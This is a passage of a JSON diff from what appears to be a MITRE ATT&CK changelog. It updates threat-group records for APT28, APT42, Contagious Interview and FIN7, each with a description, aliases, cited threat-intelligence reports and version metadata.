+                    "version_change": "1.6 \u2192 1.7"
+                }
+            ],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:48.664000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "APT28",
+                    "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ",
+                    "aliases": [
+                        "APT28",
+                        "IRON TWILIGHT",
+                        "SNAKEMACKEREL",
+                        "Swallowtail",
+                        "Group 74",
+                        "Sednit",
+                        "Sofacy",
+                        "Pawn Storm",
+                        "Fancy Bear",
+                        "STRONTIUM",
+                        "Tsar Team",
+                        "Threat Group-4127",
+                        "TG-4127",
+                        "Forest Blizzard",
+                        "FROZENLAKE",
+                        "GruesomeLarch"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0007",
+                            "external_id": "G0007"
+                        },
+                        {
+                            "source_name": "SNAKEMACKEREL",
+                            "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)"
+                        },
+                        {
+                            "source_name": "Fancy Bear",
+                            "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
+                        },
+                        {
+                            "source_name": "Tsar Team",
+                            "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)"
+                        },
+                        {
+                            "source_name": "APT28",
+                            "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
+                        },
+                        {
+                            "source_name": "STRONTIUM",
+                            "description": "(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
+                        },
+                        {
+                            "source_name": "FROZENLAKE",
+                            "description": "(Citation: Leonard TAG 2023)"
+                        },
+                        {
+                            "source_name": "Forest Blizzard",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "GruesomeLarch",
+                            "description": "(Citation: Nearest Neighbor Volexity)"
+                        },
+                        {
+                            "source_name": "IRON TWILIGHT",
+                            "description": "(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)"
+                        },
+                        {
+                            "source_name": "Threat Group-4127",
+                            "description": "(Citation: SecureWorks TG-4127)"
+                        },
+                        {
+                            "source_name": "TG-4127",
+                            "description": "(Citation: SecureWorks TG-4127)"
+                        },
+                        {
+                            "source_name": "Pawn Storm",
+                            "description": "(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) "
+                        },
+                        {
+                            "source_name": "Swallowtail",
+                            "description": "(Citation: Symantec APT28 Oct 2018)"
+                        },
+                        {
+                            "source_name": "Group 74",
+                            "description": "(Citation: Talos Seduploader Oct 2017)"
+                        },
+                        {
+                            "source_name": "Accenture SNAKEMACKEREL Nov 2018",
+                            "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.",
+                            "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50"
+                        },
+                        {
+                            "source_name": "Crowdstrike DNC June 2016",
+                            "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.",
+                            "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
+                        },
+                        {
+                            "source_name": "Leonard TAG 2023",
+                            "description": "Billy Leonard. (2023, April 19). Ukraine remains Russia\u2019s biggest cyber focus in 2023. Retrieved March 1, 2024.",
+                            "url": "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/"
+                        },
+                        {
+                            "source_name": "US District Court Indictment GRU Oct 2018",
+                            "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.",
+                            "url": "https://www.justice.gov/opa/page/file/1098481/download"
+                        },
+                        {
+                            "source_name": "GRIZZLY STEPPE JAR",
+                            "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.",
+                            "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf"
+                        },
+                        {
+                            "source_name": "ESET Zebrocy May 2019",
+                            "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.",
+                            "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"
+                        },
+                        {
+                            "source_name": "ESET Sednit Part 3",
+                            "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.",
+                            "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
+                        },
+                        {
+                            "source_name": "Sofacy DealersChoice",
+                            "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/"
+                        },
+                        {
+                            "source_name": "FireEye APT28 January 2017",
+                            "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf"
+                        },
+                        {
+                            "source_name": "FireEye APT28",
+                            "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.",
+                            "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"
+                        },
+                        {
+                            "source_name": "Ars Technica GRU indictment Jul 2018",
+                            "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.",
+                            "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/"
+                        },
+                        {
+                            "source_name": "TrendMicro Pawn Storm Dec 2020",
+                            "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm\u2019s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.",
+                            "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html"
+                        },
+                        {
+                            "source_name": "Securelist Sofacy Feb 2018",
+                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.",
+                            "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/"
+                        },
+                        {
+                            "source_name": "Kaspersky Sofacy",
+                            "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.",
+                            "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/"
+                        },
+                        {
+                            "source_name": "Nearest Neighbor Volexity",
+                            "description": "Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.",
+                            "url": "https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
+                        },
+                        {
+                            "source_name": "Palo Alto Sofacy 06-2018",
+                            "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
+                        },
+                        {
+                            "source_name": "Talos Seduploader Oct 2017",
+                            "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.",
+                            "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020",
+                            "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.",
+                            "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/"
+                        },
+                        {
+                            "source_name": "Microsoft STRONTIUM Aug 2019",
+                            "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.",
+                            "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/"
+                        },
+                        {
+                            "source_name": "DOJ GRU Indictment Jul 2018",
+                            "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024.",
+                            "url": "https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf"
+                        },
+                        {
+                            "source_name": "Cybersecurity Advisory GRU Brute Force Campaign July 2021",
+                            "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.",
+                            "url": "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF"
+                        },
+                        {
+                            "source_name": "NSA/FBI Drovorub August 2020",
+                            "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.",
+                            "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF"
+                        },
+                        {
+                            "source_name": "SecureWorks TG-4127",
+                            "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.",
+                            "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign"
+                        },
+                        {
+                            "source_name": "Secureworks IRON TWILIGHT Active Measures March 2017",
+                            "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.",
+                            "url": "https://www.secureworks.com/research/iron-twilight-supports-active-measures"
+                        },
+                        {
+                            "source_name": "Secureworks IRON TWILIGHT Profile",
+                            "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/iron-twilight"
+                        },
+                        {
+                            "source_name": "Symantec APT28 Oct 2018",
+                            "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.",
+                            "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government"
+                        },
+                        {
+                            "source_name": "Sednit",
+                            "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)"
+                        },
+                        {
+                            "source_name": "Sofacy",
+                            "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Drew Church, Splunk",
+                        "Emily Ratliff, IBM",
+                        "Richard Gold, Digital Shadows",
+                        "S\u00e9bastien Ruel, CGI"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "5.3",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2026-04-21 13:20:49.866000+00:00\"}}}",
+                    "previous_version": "5.3"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--c0291346-defe-48d7-9542-9e074ba1bdfb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-01-08 17:08:26.378000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "APT42",
+                    "description": "[APT42](https://attack.mitre.org/groups/G1044) is an Iranian-sponsored threat group that conducts cyber espionage and surveillance.(Citation: Mandiant APT42-charms) The group primarily focuses on targets in the Middle East region, but has targeted a variety of industries and countries since at least 2015.(Citation: Mandiant APT42-charms) [APT42](https://attack.mitre.org/groups/G1044) starts cyber operations through spearphishing emails and/or the PINEFLOWER Android malware, then monitors and collects information from the compromised systems and devices.(Citation: Mandiant APT42-charms) Finally, [APT42](https://attack.mitre.org/groups/G1044) exfiltrates data using native features and open-source tools.(Citation: Mandiant APT42-untangling) \n\n[APT42](https://attack.mitre.org/groups/G1044) activities have been linked to [Magic Hound](https://attack.mitre.org/groups/G0059) by other commercial vendors. While there are behavior and software overlaps between [Magic Hound](https://attack.mitre.org/groups/G0059) and [APT42](https://attack.mitre.org/groups/G1044), they appear to be distinct entities and are tracked as separate entities by their originating vendor. ",
+                    "aliases": [
+                        "APT42"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G1044",
+                            "external_id": "G1044"
+                        },
+                        {
+                            "source_name": "Mandiant APT42-charms",
+                            "description": "Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromises. Retrieved October 9, 2024.",
+                            "url": "https://services.google.com/fh/files/misc/apt42-crooked-charms-cons-and-compromises.pdf"
+                        },
+                        {
+                            "source_name": "Mandiant APT42-untangling",
+                            "description": "Rozmann, O., et al. (2024, May 1). Uncharmed: Untangling Iran's APT42 Operations. Retrieved October 9, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Sittikorn Sangrattanapitak"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-03-08 18:42:45.320000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--46599a4a-77ee-4697-9474-2683b6464859",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-19 17:04:30.994000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Contagious Interview",
+                    "description": "[Contagious Interview](https://attack.mitre.org/groups/G1052) is a North Korea\u2013aligned threat group active since 2023. The group conducts both cyberespionage and financially motivated operations, including the theft of cryptocurrency and user credentials. [Contagious Interview](https://attack.mitre.org/groups/G1052) targets Windows, Linux, and macOS systems, with a particular focus on individuals engaged in software development and cryptocurrency-related activities. (Citation: Validin Contagious Interview North Korea ClickFix January 2025)(Citation: Esentire ContagiousInterview BeaverTail InvisibleFerret November 2024)(Citation: Datadog Contagious Interview Tenacious Pungsan October 2024)(Citation: Recorded Future Contagious Inteview BeaverTail InvisibleFerret OtterCookie February 2025)(Citation: ESET Contagious Interview BeaverTail InvisibleFerret February 2025)(Citation: Zscaler ContagiousInterview BeaverTail InvisibleFerret November 2024)(Citation: PaloAlto ContagiousInterview BeaverTail InvisibleFerret November 2023)(Citation: PaloAlto Unit42 ContagiousInterview BeaverTail InvisibileFerret October 2024)",
+                    "aliases": [
+                        "Contagious Interview",
+                        "DeceptiveDevelopment",
+                        "Gwisin Gang",
+                        "Tenacious Pungsan",
+                        "DEV#POPPER",
+                        "PurpleBravo",
+                        "TAG-121"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G1052",
+                            "external_id": "G1052"
+                        },
+                        {
+                            "source_name": "Tenacious Pungsan",
+                            "description": "(Citation: Datadog Contagious Interview Tenacious Pungsan October 2024)"
+                        },
+                        {
+                            "source_name": "DeceptiveDevelopment",
+                            "description": "(Citation: ESET Contagious Interview BeaverTail InvisibleFerret February 2025)"
+                        },
+                        {
+                            "source_name": "PurpleBravo",
+                            "description": "(Citation: Recorded Future Contagious Inteview BeaverTail InvisibleFerret OtterCookie February 2025)"
+                        },
+                        {
+                            "source_name": "TAG-121",
+                            "description": "(Citation: Recorded Future Contagious Inteview BeaverTail InvisibleFerret OtterCookie February 2025)"
+                        },
+                        {
+                            "source_name": "DEV#POPPER",
+                            "description": "(Citation: Securonix Contagious Interview DEVPOPPER April 2024)"
+                        },
+                        {
+                            "source_name": "Gwisin Gang",
+                            "description": "(Citation: Sentinel One Contagious Interview ClickFix September 2025)(Citation: dtex DPRK 2025 structure ITworkers)"
+                        },
+                        {
+                            "source_name": "Sentinel One Contagious Interview ClickFix September 2025",
+                            "description": "Aleksandar Milenkoski, Sreekar Madabushi, Kenneth Kinion. (2025, September 4). Contagious Interview | North Korean Threat Actors Reveal Plans and Ops by Abusing Cyber Intel Platforms. Retrieved October 20, 2025.",
+                            "url": "https://www.sentinelone.com/labs/contagious-interview-threat-actors-scout-cyber-intel-platforms-reveal-plans-and-ops/"
+                        },
+                        {
+                            "source_name": "Validin Contagious Interview North Korea ClickFix January 2025",
+                            "description": "Efstratios Lontzetidis. (2025, January 16). Lazarus APT: Techniques for Hunting Contagious Interview. Retrieved October 20, 2025.",
+                            "url": "https://www.validin.com/blog/inoculating_contagious_interview_with_validin/"
+                        },
+                        {
+                            "source_name": "Esentire ContagiousInterview BeaverTail InvisibleFerret November 2024",
+                            "description": "eSentire Threat Response Unit (TRU). (2024, November 14). Bored BeaverTail & InvisibleFerret Yacht Club \u2013 A Lazarus Lure Pt.2. Retrieved October 17, 2025.",
+                            "url": "https://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2"
+                        },
+                        {
+                            "source_name": "Datadog Contagious Interview Tenacious Pungsan October 2024",
+                            "description": "Ian Kretz, Sebastian Obregoso, Datadog Security Research Team. (2024, October 24). Tenacious Pungsan: A DPRK threat actor linked to Contagious Interview. Retrieved October 20, 2025.",
+                            "url": "https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/"
+                        },
+                        {
+                            "source_name": "Recorded Future Contagious Inteview BeaverTail InvisibleFerret OtterCookie February 2025",
+                            "description": "Insikt Group. (2025, February 13). Inside the Scam: North Korea\u2019s IT Worker Threat. Retrieved October 17, 2025.",
+                            "url": "https://www.recordedfuture.com/research/inside-the-scam-north-koreas-it-worker-threat"
+                        },
+                        {
+                            "source_name": "ESET Contagious Interview BeaverTail InvisibleFerret February 2025",
+                            "description": "Matej Havranek. (2025, February 20). DeceptiveDevelopment targets freelance developers. Retrieved October 17, 2025.",
+                            "url": "https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/"
+                        },
+                        {
+                            "source_name": "dtex DPRK 2025 structure ITworkers",
+                            "description": "Michael \u201cBarni\u201d Barnhart, DTEX, and Anonymous SMEs. (2025, May 14). Exposing DPRK's Cyber Syndicate and Hidden IT Workforce. Retrieved September 3, 2025.",
+                            "url": "https://reports.dtexsystems.com/DTEX-Exposing+DPRK+Cyber+Syndicate+and+Hidden+IT+Workforce.pdf"
+                        },
+                        {
+                            "source_name": "Securonix Contagious Interview DEVPOPPER April 2024",
+                            "description": "Securonix Threat Research, D.Iuzvyk, T. Peck, O.Kolesnikov. (2024, April 24). Analysis of DEV#POPPER: New Attack Campaign Targeting Software Developers Likely Associated With North Korean Threat Actors. Retrieved October 20, 2025.",
+                            "url": "https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/"
+                        },
+                        {
+                            "source_name": "Zscaler ContagiousInterview BeaverTail InvisibleFerret November 2024",
+                            "description": "Seongsu Park. (2024, November 4). From Pyongyang to Your Payroll: The Rise of North Korean Remote Workers in the West. Retrieved October 17, 2025.",
+                            "url": "https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west"
+                        },
+                        {
+                            "source_name": "PaloAlto ContagiousInterview BeaverTail InvisibleFerret November 2023",
+                            "description": "Unit 42. (2023, November 21). Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors. Retrieved October 17, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/"
+                        },
+                        {
+                            "source_name": "PaloAlto Unit42 ContagiousInterview BeaverTail InvisibileFerret October 2024",
+                            "description": "Unit42. (2024, October 9). Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware. Retrieved October 17, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-10-24 02:54:55.039000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:09.460000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "FIN7",
+                    "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013. [FIN7](https://attack.mitre.org/groups/G0046) has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to big game hunting (BGH), including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but multiple threat groups have been observed using [Carbanak](https://attack.mitre.org/software/S0030), leading these groups to be tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)(Citation: BiZone Lizar May 2021)",
+                    "aliases": [
+                        "FIN7",
+                        "GOLD NIAGARA",
+                        "ITG14",
+                        "Carbon Spider",
+                        "ELBRUS",
+                        "Sangria Tempest"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0046",
+                            "external_id": "G0046"
+                        },
+                        {
+                            "source_name": "Carbon Spider",
+                            "description": "(Citation: CrowdStrike Carbon Spider August 2021)"
+                        },
+                        {
+                            "source_name": "FIN7",
+                            "description": "(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)"
+                        },
+                        {
+                            "source_name": "ELBRUS",
+                            "description": "(Citation: Microsoft Ransomware as a Service)"
+                        },
+                        {
+                            "source_name": "Sangria Tempest",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "GOLD NIAGARA",
+                            "description": "(Citation: Secureworks GOLD NIAGARA Threat Profile)"
+                        },
+                        {
+                            "source_name": "Mandiant FIN7 Apr 2022",
+                            "description": "Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.",
+                            "url": "https://www.mandiant.com/resources/evolution-of-fin7"
+                        },
+                        {
+                            "source_name": "FireEye CARBANAK June 2017",
+                            "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
+                        },
+                        {
+                            "source_name": "BiZone Lizar May 2021",
+                            "description": "BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker\u2019s toolkit. Retrieved February 2, 2022.",
+                            "url": "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 April 2017",
+                            "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 Aug 2018",
+                            "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
